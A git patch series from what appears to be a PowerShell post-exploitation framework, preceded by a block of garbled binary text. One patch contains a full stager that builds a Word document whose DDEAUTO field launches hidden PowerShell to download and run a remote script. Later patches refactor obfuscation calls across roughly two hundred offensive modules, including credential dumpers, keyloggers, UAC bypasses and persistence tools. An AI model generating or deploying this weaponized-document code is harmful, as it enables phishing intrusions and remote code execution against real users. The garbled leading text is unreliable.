zS<3t)N92ntrqGzC3*J0a%M5-y&%FygCOF2L3;wIdYXFC;o=3pB@==o*>2m_MP2oUN4!b5JcPyUsy`A*C>!*^67oWvcA^ z+j)augtZsMA2{#9V+?2_a~YBGc@YxBo;IIifo&^fA>MZg?XA z#u#(b#J$6I^pJJA^gWi@OF6f^t4Hs5aJkV1RfpVoyc$Z?oio9+LA~2FmGYeg@%co} z2Th|sNrgHkXqFv<*fb>P Date: Fri, 20 Oct 2017 10:03:02 -0400 Subject: [PATCH 25/50] moved the macroless word code exec from 'exploits' to 'stagers' per Xorrior --- .../windows}/macroless_msword.py | 151 ++++++++---------- 1 file changed, 66 insertions(+), 85 deletions(-) rename lib/{modules/python/exploit/fileformat => stagers/windows}/macroless_msword.py (93%) diff --git a/lib/modules/python/exploit/fileformat/macroless_msword.py b/lib/stagers/windows/macroless_msword.py similarity index 93% rename from lib/modules/python/exploit/fileformat/macroless_msword.py rename to lib/stagers/windows/macroless_msword.py index 62ccd85..f40fe1c 100644 --- a/lib/modules/python/exploit/fileformat/macroless_msword.py +++ b/lib/stagers/windows/macroless_msword.py @@ -2,7 +2,7 @@ from lib.common import helpers import os -class Module: +class Stager: def __init__(self, mainMenu, params=[]): @@ -14,18 +14,6 @@ class Module: 'Description': ('Creates a macroless document utilizing a formula field for code execution'), - 'Background' : False, - - 'OutputExtension' : "", - - 'NeedsAdmin' : False, - - 'OpsecSafe' : False, - - 'Language' : 'python', - - 'MinLanguageVersion' : '2.7', - 'Comments': ["Hard work by Etienne Stalmas and Saif El-Sherei"] } @@ -33,12 +21,6 @@ class Module: self.options = { # format: # value_name : {description, required, default_value} - 'Agent' : { - # The 'Agent' option is the only one that MUST be in a module - 'Description' : 'Agent to execute on.', - 'Required' : True, - 'Value' : '' - }, 'Listener' : { 'Description' : 'Listener to use for the payload.', 'Required' : True, @@ -83,108 +65,107 @@ class Module: def generate(self, obfuscate=False, obfuscationCommand=""): - listener = self.options['Listener']['Value'] - output_path = self.options['OutputPath']['Value'] - output_docx = self.options['OutputDocx']['Value'] - host = self.options['HostURL']['Value'] - ps1 = self.options['OutputPs1']['Value'] + listener = self.options['Listener']['Value'] + output_path = self.options['OutputPath']['Value'] + output_docx = self.options['OutputDocx']['Value'] + host = self.options['HostURL']['Value'] + ps1 = self.options['OutputPs1']['Value'] - if not self.mainMenu.listeners.is_listener_valid(listener): - print helpers.color("[!] Invalide listener: " + listener) - return "" - else: - launcher = self.mainMenu.stagers.generate_launcher(listener, language='powershell', encode=True) + if not self.mainMenu.listeners.is_listener_valid(listener): + print helpers.color("[!] Invalid listener: " + listener) + return "" + else: + launcher = self.mainMenu.stagers.generate_launcher(listener, language='powershell', encode=True) - def create_directory_structure(outdir): - os.makedirs(outdir + "_rels") - os.makedirs(outdir + "docProps") - os.makedirs(outdir + "word") - os.makedirs(outdir + "word/_rels") - os.makedirs(outdir + "word/theme") + def create_directory_structure(outdir): + os.makedirs(outdir + "_rels") + os.makedirs(outdir + "docProps") + os.makedirs(outdir + "word") + os.makedirs(outdir + "word/_rels") + os.makedirs(outdir + "word/theme") - def create_files(outdir): - content_types = """ + def create_files(outdir): + content_types = """ """ - f = open(outdir + "[Content_Types].xml", 'w') - f.write(content_types) + f = open(outdir + "[Content_Types].xml", 'w') + f.write(content_types) - hidden_rels = """ + hidden_rels = """ """ - f = open(outdir + "_rels/.rels", 'w') - f.write(hidden_rels) + f = open(outdir + "_rels/.rels", 'w') + f.write(hidden_rels) - docProps_app = """ + docProps_app = """ 211270Microsoft Office Word011falseTitle1false81falsefalse16.0000""" - f = open(outdir + "docProps/app.xml", 'w') - f.write(docProps_app) - docProps_core = """ + f = open(outdir + "docProps/app.xml", 'w') + f.write(docProps_app) + + docProps_core = """ AdministratorAdministrator12017-10-11T12:49:00Z2017-10-11T12:51:00Z""" - f = open(outdir + "docProps/core.xml", 'w') - f.write(docProps_core) + f = open(outdir + "docProps/core.xml", 'w') + f.write(docProps_core) - word_rels = """ + word_rels = """ """ - f = open(outdir + "word/_rels/document.xml.rels", 'w') - f.write(word_rels) - word_theme = """ + f = open(outdir + "word/_rels/document.xml.rels", 'w') + f.write(word_rels) + + word_theme = """ """ - f = open(outdir + "word/theme/theme1.xml", 'w') - f.write(word_theme) + f = open(outdir + "word/theme/theme1.xml", 'w') + f.write(word_theme) - font_table = """ + font_table = """ """ - f = open(outdir + "word/fontTable.xml", 'w') - f.write(font_table) + f = open(outdir + "word/fontTable.xml", 'w') + f.write(font_table) - settings = """ + settings = """ """ - f = open(outdir + "word/settings.xml", 'w') - f.write(settings) + f = open(outdir + "word/settings.xml", 'w') + f.write(settings) - styles = """ + styles = """ """ - f = open(outdir + "word/styles.xml", 'w') - f.write(styles) + f = open(outdir + "word/styles.xml", 'w') + f.write(styles) - web_settings = """ + web_settings = """ """ - f = open(outdir + "word/webSettings.xml", 'w') - f.write(web_settings) + f = open(outdir + "word/webSettings.xml", 'w') + f.write(web_settings) - def craft_exploit(outdir, url, pshell): - document = """ + def craft_exploit(outdir, url, pshell): + document = """ DDEAUTO C:\\\\Windows\\\\System32\\\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('%s/%s');powershell -noP -sta -w 1 -enc $e "!Unexpected End of Formula""" % (url, pshell) - f = open(outdir + "word/document.xml", 'w') - f.write(document) + f = open(outdir + "word/document.xml", 'w') + f.write(document) - def craft_ps(outdir, pshell_blob, fname): - pshell_blob = pshell_blob.split("powershell -noP -sta -w 1 -enc ")[1] - f = open(outdir + fname, 'w') - f.write(pshell_blob) + def craft_ps(outdir, pshell_blob, fname): + pshell_blob = pshell_blob.split("powershell -noP -sta -w 1 -enc ")[1] + f = open(outdir + fname, 'w') + f.write(pshell_blob) - if output_path[-1] != "/": - output_path = output_path + "/" + if output_path[-1] != "/": + output_path = output_path + "/" - create_directory_structure(output_path) - create_files(output_path) - craft_ps(output_path, launcher, ps1) - craft_exploit(output_path, host, ps1) + create_directory_structure(output_path) + create_files(output_path) + craft_ps(output_path, launcher, ps1) + craft_exploit(output_path, host, ps1) - # very hacky - os.system("cd %s && zip %s%s -r [Content_Types].xml docProps/ _rels word && rm -rf [Content_Types].xml docProps/ _rels/ word/ && cd -" % (output_path, output_path, output_docx)) + print helpers.color("[+] '%s' and '%s' was created in the '%s' directory" % (output_docx, ps1, output_path)) - print helpers.color("[+] '%s' and '%s' was created in the '%s' directory" % (output_docx, ps1, output_path)) + return os.system("cd %s && zip %s%s -r [Content_Types].xml docProps/ _rels word && rm -rf [Content_Types].xml docProps/ _rels/ word/ && cd -" % (output_path, output_path, output_docx)) - # very hacky to avoid 'no script returned' message - return "import sys" From fcc6eb02e526973020939e99a8e0034b3b98fa50 Mon Sep 17 00:00:00 2001 From: xorrior Date: Fri, 20 Oct 2017 22:07:03 -0400 Subject: [PATCH 26/50] Fix #769 --- lib/listeners/http.py | 4 ++-- lib/listeners/http_com.py | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/listeners/http.py b/lib/listeners/http.py index ecde4f2..610d0a1 100644 --- a/lib/listeners/http.py +++ b/lib/listeners/http.py @@ -494,7 +494,7 @@ class Listener: randomizedStager += line if obfuscate: - randomizedStager = helpers.obfuscate(randomizedStager, obfuscationCommand=obfuscationCommand) + randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager, obfuscationCommand=obfuscationCommand) # base64 encode the stager and return it if encode: return helpers.enc_powershell(randomizedStager) @@ -585,7 +585,7 @@ class Listener: if killDate != "": code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',") if obfuscate: - code = helpers.obfuscate(code, obfuscationCommand=obfuscationCommand) + code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand) return code elif language == 'python': diff --git a/lib/listeners/http_com.py b/lib/listeners/http_com.py index 459b2aa..59833de 100644 --- a/lib/listeners/http_com.py +++ b/lib/listeners/http_com.py @@ -313,7 +313,7 @@ class Listener: randomizedStager += line if obfuscate: - randomizedStager = helpers.obfuscate(randomizedStager, self.mainMenu.installPath, obfuscationCommand=obfuscationCommand) + randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager, obfuscationCommand=obfuscationCommand) # base64 encode the stager and return it if encode: return helpers.enc_powershell(randomizedStager) @@ -369,7 +369,7 @@ class Listener: if killDate != "": code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',") if obfuscate: - code = helpers.obfuscate(code, self.mainMenu.installPath, obfuscationCommand=obfuscationCommand) + code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand) return code else: From 2c7d62593b95bed9116443d53ac520d30f9775cd Mon Sep 17 00:00:00 2001 From: xorrior Date: Fri, 20 Oct 2017 23:16:19 -0400 Subject: [PATCH 27/50] Updated obfuscate function arguments in all powershell modules --- .../powershell/code_execution/invoke_dllinjection.py | 2 +- .../code_execution/invoke_metasploitpayload.py | 2 +- .../code_execution/invoke_reflectivepeinjection.py | 2 +- .../powershell/code_execution/invoke_shellcode.py | 2 +- .../code_execution/invoke_shellcodemsil.py | 2 +- lib/modules/powershell/collection/ChromeDump.py | 2 +- lib/modules/powershell/collection/FoxDump.py | 2 +- lib/modules/powershell/collection/USBKeylogger.py | 2 +- lib/modules/powershell/collection/WebcamRecorder.py | 2 +- lib/modules/powershell/collection/browser_data.py | 2 +- .../powershell/collection/clipboard_monitor.py | 2 +- lib/modules/powershell/collection/file_finder.py | 2 +- .../powershell/collection/find_interesting_file.py | 2 +- .../powershell/collection/get_indexed_item.py | 2 +- .../collection/get_sql_column_sample_data.py | 2 +- lib/modules/powershell/collection/get_sql_query.py | 2 +- lib/modules/powershell/collection/inveigh.py | 2 +- lib/modules/powershell/collection/keylogger.py | 2 +- lib/modules/powershell/collection/minidump.py | 2 +- lib/modules/powershell/collection/netripper.py | 2 +- lib/modules/powershell/collection/ninjacopy.py | 2 +- lib/modules/powershell/collection/packet_capture.py | 2 +- lib/modules/powershell/collection/prompt.py | 2 +- lib/modules/powershell/collection/screenshot.py | 2 +- .../collection/vaults/add_keepass_config_trigger.py | 2 +- .../collection/vaults/find_keepass_config.py | 2 +- .../collection/vaults/get_keepass_config_trigger.py | 2 +- lib/modules/powershell/collection/vaults/keethief.py | 2 +- .../vaults/remove_keepass_config_trigger.py | 2 +- .../powershell/credentials/credential_injection.py | 2 +- .../powershell/credentials/enum_cred_store.py | 2 +- .../powershell/credentials/invoke_kerberoast.py | 2 +- lib/modules/powershell/credentials/mimikatz/cache.py | 2 +- lib/modules/powershell/credentials/mimikatz/certs.py | 2 +- .../powershell/credentials/mimikatz/command.py | 2 +- .../powershell/credentials/mimikatz/dcsync.py | 2 +- .../credentials/mimikatz/dcsync_hashdump.py | 2 +- .../credentials/mimikatz/extract_tickets.py | 2 +- .../powershell/credentials/mimikatz/golden_ticket.py | 2 +- .../credentials/mimikatz/logonpasswords.py | 2 +- .../powershell/credentials/mimikatz/lsadump.py | 2 +- .../powershell/credentials/mimikatz/mimitokens.py | 2 +- lib/modules/powershell/credentials/mimikatz/pth.py | 2 +- lib/modules/powershell/credentials/mimikatz/purge.py | 2 +- lib/modules/powershell/credentials/mimikatz/sam.py | 2 +- .../powershell/credentials/mimikatz/silver_ticket.py | 2 +- .../powershell/credentials/mimikatz/trust_keys.py | 2 +- lib/modules/powershell/credentials/powerdump.py | 2 +- lib/modules/powershell/credentials/sessiongopher.py | 2 +- lib/modules/powershell/credentials/tokens.py | 2 +- .../powershell/credentials/vault_credential.py | 2 +- lib/modules/powershell/exfiltration/egresscheck.py | 2 +- lib/modules/powershell/exploitation/exploit_jboss.py | 2 +- .../powershell/exploitation/exploit_jenkins.py | 2 +- .../powershell/lateral_movement/inveigh_relay.py | 2 +- .../powershell/lateral_movement/invoke_dcom.py | 2 +- .../lateral_movement/invoke_executemsbuild.py | 2 +- .../powershell/lateral_movement/invoke_psexec.py | 2 +- .../powershell/lateral_movement/invoke_psremoting.py | 2 +- .../powershell/lateral_movement/invoke_sqloscmd.py | 2 +- .../powershell/lateral_movement/invoke_sshcommand.py | 2 +- .../powershell/lateral_movement/invoke_wmi.py | 2 +- .../lateral_movement/invoke_wmi_debugger.py | 2 +- .../lateral_movement/jenkins_script_console.py | 2 +- .../lateral_movement/new_gpo_immediate_task.py | 2 +- lib/modules/powershell/management/disable_rdp.py | 2 +- .../powershell/management/downgrade_account.py | 2 +- .../powershell/management/enable_multi_rdp.py | 2 +- lib/modules/powershell/management/enable_rdp.py | 2 +- lib/modules/powershell/management/get_domain_sid.py | 2 +- lib/modules/powershell/management/honeyhash.py | 2 +- lib/modules/powershell/management/invoke_script.py | 2 +- lib/modules/powershell/management/lock.py | 2 +- lib/modules/powershell/management/logoff.py | 2 +- .../management/mailraider/disable_security.py | 2 +- .../management/mailraider/get_emailitems.py | 2 +- .../management/mailraider/get_subfolders.py | 2 +- .../powershell/management/mailraider/mail_search.py | 2 +- .../powershell/management/mailraider/search_gal.py | 2 +- .../powershell/management/mailraider/send_mail.py | 2 +- .../powershell/management/mailraider/view_email.py | 2 +- lib/modules/powershell/management/psinject.py | 2 +- .../powershell/management/reflective_inject.py | 2 +- lib/modules/powershell/management/restart.py | 2 +- lib/modules/powershell/management/runas.py | 2 +- lib/modules/powershell/management/sid_to_user.py | 2 +- lib/modules/powershell/management/spawn.py | 2 +- lib/modules/powershell/management/spawnas.py | 2 +- lib/modules/powershell/management/switch_listener.py | 2 +- lib/modules/powershell/management/timestomp.py | 2 +- lib/modules/powershell/management/user_to_sid.py | 2 +- lib/modules/powershell/management/vnc.py | 2 +- .../powershell/management/wdigest_downgrade.py | 2 +- lib/modules/powershell/management/zipfolder.py | 2 +- .../powershell/persistence/elevated/registry.py | 2 +- .../powershell/persistence/elevated/schtasks.py | 4 ++-- lib/modules/powershell/persistence/elevated/wmi.py | 4 ++-- .../powershell/persistence/misc/add_netuser.py | 2 +- .../powershell/persistence/misc/add_sid_history.py | 2 +- lib/modules/powershell/persistence/misc/debugger.py | 4 ++-- .../persistence/misc/disable_machine_acct_change.py | 4 ++-- lib/modules/powershell/persistence/misc/get_ssps.py | 2 +- .../powershell/persistence/misc/install_ssp.py | 2 +- lib/modules/powershell/persistence/misc/memssp.py | 2 +- .../powershell/persistence/misc/skeleton_key.py | 2 +- .../powershell/persistence/powerbreach/deaduser.py | 4 ++-- .../powershell/persistence/powerbreach/eventlog.py | 4 ++-- .../powershell/persistence/powerbreach/resolver.py | 4 ++-- .../powershell/persistence/userland/backdoor_lnk.py | 2 +- .../powershell/persistence/userland/registry.py | 4 ++-- .../powershell/persistence/userland/schtasks.py | 4 ++-- lib/modules/powershell/privesc/ask.py | 2 +- lib/modules/powershell/privesc/bypassuac.py | 2 +- lib/modules/powershell/privesc/bypassuac_eventvwr.py | 2 +- .../privesc/bypassuac_tokenmanipulation.py | 2 +- lib/modules/powershell/privesc/bypassuac_wscript.py | 2 +- lib/modules/powershell/privesc/getsystem.py | 2 +- lib/modules/powershell/privesc/gpp.py | 2 +- lib/modules/powershell/privesc/mcafee_sitelist.py | 2 +- lib/modules/powershell/privesc/ms16-032.py | 2 +- lib/modules/powershell/privesc/ms16-135.py | 2 +- lib/modules/powershell/privesc/powerup/allchecks.py | 2 +- .../powershell/privesc/powerup/find_dllhijack.py | 2 +- .../privesc/powerup/service_exe_restore.py | 2 +- .../powershell/privesc/powerup/service_exe_stager.py | 2 +- .../privesc/powerup/service_exe_useradd.py | 2 +- .../powershell/privesc/powerup/service_stager.py | 2 +- .../powershell/privesc/powerup/service_useradd.py | 2 +- .../powershell/privesc/powerup/write_dllhijacker.py | 2 +- lib/modules/powershell/privesc/tater.py | 2 +- lib/modules/powershell/recon/find_fruit.py | 2 +- .../recon/get_sql_server_login_default_pw.py | 2 +- lib/modules/powershell/recon/http_login.py | 2 +- .../situational_awareness/host/antivirusproduct.py | 2 +- .../situational_awareness/host/computerdetails.py | 12 ++++++------ .../situational_awareness/host/dnsserver.py | 2 +- .../host/findtrusteddocuments.py | 2 +- .../situational_awareness/host/get_pathacl.py | 2 +- .../situational_awareness/host/get_proxy.py | 2 +- .../host/monitortcpconnections.py | 2 +- .../situational_awareness/host/paranoia.py | 2 +- .../powershell/situational_awareness/host/winenum.py | 2 +- .../situational_awareness/network/arpscan.py | 2 +- .../situational_awareness/network/bloodhound.py | 2 +- .../network/get_exploitable_system.py | 2 +- .../situational_awareness/network/get_spn.py | 2 +- .../network/get_sql_instance_domain.py | 2 +- .../network/get_sql_server_info.py | 2 +- .../situational_awareness/network/portscan.py | 2 +- .../network/powerview/find_computer_field.py | 2 +- .../network/powerview/find_foreign_group.py | 2 +- .../network/powerview/find_foreign_user.py | 2 +- .../network/powerview/find_gpo_computer_admin.py | 2 +- .../network/powerview/find_gpo_location.py | 2 +- .../network/powerview/find_localadmin_access.py | 2 +- .../network/powerview/find_managed_security_group.py | 2 +- .../network/powerview/find_user_field.py | 2 +- .../network/powerview/get_cached_rdpconnection.py | 2 +- .../network/powerview/get_computer.py | 2 +- .../network/powerview/get_dfs_share.py | 2 +- .../network/powerview/get_domain_controller.py | 2 +- .../network/powerview/get_domain_policy.py | 2 +- .../network/powerview/get_domain_trust.py | 2 +- .../network/powerview/get_fileserver.py | 2 +- .../network/powerview/get_forest.py | 2 +- .../network/powerview/get_forest_domain.py | 2 +- .../network/powerview/get_gpo.py | 2 +- .../network/powerview/get_gpo_computer.py | 2 +- .../network/powerview/get_group.py | 2 +- .../network/powerview/get_group_member.py | 2 +- .../network/powerview/get_localgroup.py | 2 +- .../network/powerview/get_loggedon.py | 2 +- .../network/powerview/get_object_acl.py | 2 +- .../network/powerview/get_ou.py | 2 +- .../network/powerview/get_rdp_session.py | 2 +- .../network/powerview/get_session.py | 2 +- .../network/powerview/get_site.py | 2 +- .../network/powerview/get_subnet.py | 2 +- .../network/powerview/get_user.py | 2 +- .../network/powerview/map_domain_trust.py | 2 +- .../network/powerview/process_hunter.py | 2 +- .../network/powerview/set_ad_object.py | 2 +- .../network/powerview/share_finder.py | 2 +- .../network/powerview/user_hunter.py | 2 +- .../situational_awareness/network/reverse_dns.py | 2 +- .../situational_awareness/network/smbautobrute.py | 2 +- .../situational_awareness/network/smbscanner.py | 2 +- lib/modules/powershell/trollsploit/get_schwifty.py | 2 +- lib/modules/powershell/trollsploit/message.py | 2 +- lib/modules/powershell/trollsploit/process_killer.py | 2 +- lib/modules/powershell/trollsploit/rick_ascii.py | 2 +- lib/modules/powershell/trollsploit/rick_astley.py | 2 +- lib/modules/powershell/trollsploit/thunderstruck.py | 2 +- lib/modules/powershell/trollsploit/voicetroll.py | 2 +- lib/modules/powershell/trollsploit/wallpaper.py | 2 +- lib/modules/powershell/trollsploit/wlmdr.py | 2 +- 196 files changed, 210 insertions(+), 210 deletions(-) diff --git a/lib/modules/powershell/code_execution/invoke_dllinjection.py b/lib/modules/powershell/code_execution/invoke_dllinjection.py index 3f2a94e..682b8d7 100644 --- a/lib/modules/powershell/code_execution/invoke_dllinjection.py +++ b/lib/modules/powershell/code_execution/invoke_dllinjection.py @@ -88,6 +88,6 @@ class Module: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/code_execution/invoke_metasploitpayload.py b/lib/modules/powershell/code_execution/invoke_metasploitpayload.py index 38c4c6d..62c83f8 100644 --- a/lib/modules/powershell/code_execution/invoke_metasploitpayload.py +++ b/lib/modules/powershell/code_execution/invoke_metasploitpayload.py @@ -72,6 +72,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/code_execution/invoke_reflectivepeinjection.py b/lib/modules/powershell/code_execution/invoke_reflectivepeinjection.py index 531b1f9..7851ee4 100644 --- a/lib/modules/powershell/code_execution/invoke_reflectivepeinjection.py +++ b/lib/modules/powershell/code_execution/invoke_reflectivepeinjection.py @@ -127,6 +127,6 @@ class Module: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/code_execution/invoke_shellcode.py b/lib/modules/powershell/code_execution/invoke_shellcode.py index 2bf16e6..354c783 100644 --- a/lib/modules/powershell/code_execution/invoke_shellcode.py +++ b/lib/modules/powershell/code_execution/invoke_shellcode.py @@ -145,6 +145,6 @@ class Module: scriptEnd += "; 'Shellcode injected.'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/code_execution/invoke_shellcodemsil.py b/lib/modules/powershell/code_execution/invoke_shellcodemsil.py index fe0d112..e18b565 100644 --- a/lib/modules/powershell/code_execution/invoke_shellcodemsil.py +++ b/lib/modules/powershell/code_execution/invoke_shellcodemsil.py @@ -89,6 +89,6 @@ class Module: sc = ",0".join(values['Value'].split("\\"))[1:] scriptEnd += " -" + str(option) + " @(" + sc + ")" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/ChromeDump.py b/lib/modules/powershell/collection/ChromeDump.py index 1c3ccd0..dec2c33 100644 --- a/lib/modules/powershell/collection/ChromeDump.py +++ b/lib/modules/powershell/collection/ChromeDump.py @@ -103,6 +103,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/FoxDump.py b/lib/modules/powershell/collection/FoxDump.py index 29ae719..b7fb455 100644 --- a/lib/modules/powershell/collection/FoxDump.py +++ b/lib/modules/powershell/collection/FoxDump.py @@ -107,6 +107,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/USBKeylogger.py b/lib/modules/powershell/collection/USBKeylogger.py index 3ab8daf..8fa6881 100644 --- a/lib/modules/powershell/collection/USBKeylogger.py +++ b/lib/modules/powershell/collection/USBKeylogger.py @@ -79,6 +79,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/WebcamRecorder.py b/lib/modules/powershell/collection/WebcamRecorder.py index 763cf41..6258f09 100644 --- a/lib/modules/powershell/collection/WebcamRecorder.py +++ b/lib/modules/powershell/collection/WebcamRecorder.py @@ -216,5 +216,5 @@ Start-WebcamRecorder""" else: script += " -" + str(option) + " " + str(values['Value']) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/collection/browser_data.py b/lib/modules/powershell/collection/browser_data.py index 0a455b5..6f0f9a0 100644 --- a/lib/modules/powershell/collection/browser_data.py +++ b/lib/modules/powershell/collection/browser_data.py @@ -103,6 +103,6 @@ class Module: scriptEnd += " -" + str(option) + " " + str(values['Value']) scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/clipboard_monitor.py b/lib/modules/powershell/collection/clipboard_monitor.py index d12fe04..e13bac2 100644 --- a/lib/modules/powershell/collection/clipboard_monitor.py +++ b/lib/modules/powershell/collection/clipboard_monitor.py @@ -89,6 +89,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/file_finder.py b/lib/modules/powershell/collection/file_finder.py index e66d908..8b8f7bf 100644 --- a/lib/modules/powershell/collection/file_finder.py +++ b/lib/modules/powershell/collection/file_finder.py @@ -162,5 +162,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/collection/find_interesting_file.py b/lib/modules/powershell/collection/find_interesting_file.py index 1a68474..6795ee6 100644 --- a/lib/modules/powershell/collection/find_interesting_file.py +++ b/lib/modules/powershell/collection/find_interesting_file.py @@ -127,5 +127,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/collection/get_indexed_item.py b/lib/modules/powershell/collection/get_indexed_item.py index 3039b13..37c8a8e 100644 --- a/lib/modules/powershell/collection/get_indexed_item.py +++ b/lib/modules/powershell/collection/get_indexed_item.py @@ -88,6 +88,6 @@ class Module: scriptEnd += " | ?{!($_.ITEMURL -like '*AppData*')} | Select-Object ITEMURL, COMPUTERNAME, FILEOWNER, SIZE, DATECREATED, DATEACCESSED, DATEMODIFIED, AUTOSUMMARY" scriptEnd += " | fl | Out-String;" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/get_sql_column_sample_data.py b/lib/modules/powershell/collection/get_sql_column_sample_data.py index 7f9d007..3f32243 100644 --- a/lib/modules/powershell/collection/get_sql_column_sample_data.py +++ b/lib/modules/powershell/collection/get_sql_column_sample_data.py @@ -114,6 +114,6 @@ class Module: if no_defaults: scriptEnd += " -NoDefaults " if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/get_sql_query.py b/lib/modules/powershell/collection/get_sql_query.py index bdf45f5..7079566 100644 --- a/lib/modules/powershell/collection/get_sql_query.py +++ b/lib/modules/powershell/collection/get_sql_query.py @@ -89,6 +89,6 @@ class Module: scriptEnd += " -Instance "+instance scriptEnd += " -Query "+"\'"+query+"\'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/inveigh.py b/lib/modules/powershell/collection/inveigh.py index 828d8ef..bf3425c 100644 --- a/lib/modules/powershell/collection/inveigh.py +++ b/lib/modules/powershell/collection/inveigh.py @@ -232,6 +232,6 @@ class Module: else: scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\"" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/keylogger.py b/lib/modules/powershell/collection/keylogger.py index 2318eb6..0a5d619 100644 --- a/lib/modules/powershell/collection/keylogger.py +++ b/lib/modules/powershell/collection/keylogger.py @@ -77,6 +77,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/minidump.py 